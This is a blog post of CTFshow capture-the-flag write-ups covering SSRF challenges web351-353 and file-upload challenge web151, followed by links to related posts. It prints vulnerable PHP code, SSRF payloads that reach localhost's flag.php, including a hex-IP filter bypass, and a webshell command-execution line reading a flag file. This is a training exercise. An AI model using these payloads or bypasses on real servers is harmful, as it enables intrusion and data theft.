CTFshow-SSRF&文件上传

于 2024-12-26 08:19:55 发布
阅读量361 收藏 4
点赞数 13
CC 4.0 BY-SA版权
分类专栏: CTFshow 文章标签: 网络 大数据 运维 web安全 安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CLAY0011/article/details/144732874

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

构造POST

url=http://127.0.0.1/flag.php

web352

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

代码分析

error_reporting(0); 这一行关闭了所有PHP错误报告,这在生产环境中可能是为了保持用户体验的干净,但在开发过程中关闭错误报告不是一个好习惯,因为它会使调试更加困难。
highlight_file(__FILE__); 这行代码的作用是显示当前文件的源代码。当这个PHP脚本被执行时,它会高亮显示自身的代码。这通常用于学习或展示代码的目的,但它也可能无意中暴露了源代码,带来安全隐患。
$url = $_POST['url']; 这行代码从POST请求中获取名为url的参数值,将其赋值给变量$url。
$x = parse_url($url); 使用parse_url()函数解析$url,并返回一个关联数组,其中包含了URL的不同部分(如方案、主机名等)。
if($x['scheme'] === 'http' || $x['scheme'] === 'https') { ... } else { die('hacker'); } 这段条件语句检查解析后的URL是否使用的是HTTP或HTTPS协议。如果不是这两种协议之一,则程序终止执行,并输出'hacker',这可能是为了阻止尝试利用其他协议进行的攻击。
在检查协议之后,代码进一步检查URL中是否包含localhost或127.0.0(通常代表本地回环地址)。这是通过preg_match()函数完成的。如果匹配成功(即URL试图访问本地资源),则程序也会终止执行并输出'hacker'。
如果上述两个检查都通过了,代码将继续执行。它使用cURL库来发送HTTP请求到提供的URL,并通过设置选项CURLOPT_RETURNTRANSFER为1来确保响应体被作为字符串返回而不是直接输出。然后,通过curl_exec()执行请求,并将结果存储在变量$result中。
最后,echo ($result); 输出从远程服务器接收到的内容。

同上

web353

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

用16进制绕过

POST

url=http://0x7f.0.0.1/flag.php

web151

只能上传png格式的图片

bp改个后缀名

命令执行

1=system("tac /var/www/html/flag.php");

1=system("tac /var/www/html/flag.php");

ctfshow-SSRF
qq_45655564的博客
07-01 537
web351-普通的ssrf本地访问 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?&
ctfshow-web80
m0_73303597的博客
01-04 747
自用
ctfshow—SSRF详解
cosmoslin的博客
09-24 1427
web 351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 前置 c
PHP代码审计8—SSRF 漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-02 2180
SSRF基础学习
ctfshow SSRF
qq_61768489的博客
03-21 3098
这位师傅讲的非常详细 web351 给了一段代码,不知道什么意思就去查看PHP cURL 函数 | 菜鸟教程 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url);//初始化 cURL 会话 curl_setopt($ch, CURLOPT_HEADER, 0);//启用时会将头文件的信息作为数据流输出。 curl_setopt($ch, CURLOPT_RET
ctfshow web入门 SSRF(超详解)
qq_50589021的博客
09-08 8018
前言 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) https://ctf-wiki.org/web/ssrf/ https://www.freebuf.com/articles/web/260806.html web351 <?php error_reporting(0)
CTFSHOWweb入门SSRF
7ruth0hn的博客
06-21 1302
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
ctfshow 黑盒测试web380-395 wp
m0_50936156的博客
04-22 504
目录web 380web 381web 381,382web 383-386web 387web 49web 50web 51web 52 记录下学习内容 web 380 开启题目,一个小型网站,四处浏览,没半点头绪,后来想到了目录扫描,结果线程最大为5否则504,看其他师傅的wp 有一个page.php页面 打开$id.php失败 猜到是file_get_contents,id传入page,出现关键部分 $html = file_get_contents('page_'.$id.'.php');
CTF-Web】XXE学习笔记(附ctfshow例题)
jayq1的博客
05-29 2321
XXE学习笔记
ctfshow 1024杯
qq_45655564的博客
09-03 762
1024_WEB签到 phpinfo中有个自定义的函数,不多说了,自己找找看把 1024_柏拉图 双写绕过file://,然后利用file协议读取文件, index.php <?php error_reporting(0); function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); echo cur
CTFshow web入门 SSRF
Lum1n0us's Blog
07-17 579
web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 第一题,啥也没
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 3150
这段代码是一个 PHP 程序,它实现了从用户输入中获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件中是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
php反序列化之字符逃逸
qq_53856457的博客
05-14 2159
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
CTFshow——SSRF
lee_maple的博客
04-23 3838
CTFshow——SSRF Web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result
【moeCTF题解-0x06】Web
框架科工:Framecraft
11-06 2739
title: 【moeCTF题解-0x06】Web categories: CTF moeCTF tags: CTF Web Python 【moeCTF题解-0x06】Web 竟然AK了这部分,但也只是因为题目简单…… 考虑到在XDSEC里选了web方向,也要好好学习web知识呀 【moeCTF题解】总目录如下:(若本文图片看不见请访问以下相应的地址) 【moeCTF题解-0x00】序 (包括Sign in) 【moeCTF题解-0x01】Reverse (包括An.
[CTFSHOW]SSRF
Y4tacker的博客
01-12 1910
web351 首先代码审计,简简单单的使用php的curl,发现没有过滤,尝试读取本地文件 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_clo
ctfshow-web入门-ssrf-351--360
yutianovo的博客
01-14 902
Web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 使用 file
CTFSHOW-PHP反序列化
Monica的博客
09-24 3516
WEB254 题目: <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->
ctfshow web 22
最新发布
04-01
- 文件上传漏洞:允许用户上传可执行脚本并触发远程命令执行。 - XSS 跨站脚本攻击:注入 JavaScript 代码窃取敏感数据。 - SSRF(服务器端请求伪造):诱导目标服务发起内部网络通信。 - 权限控制缺陷:滥用管理员...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小丑001.

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值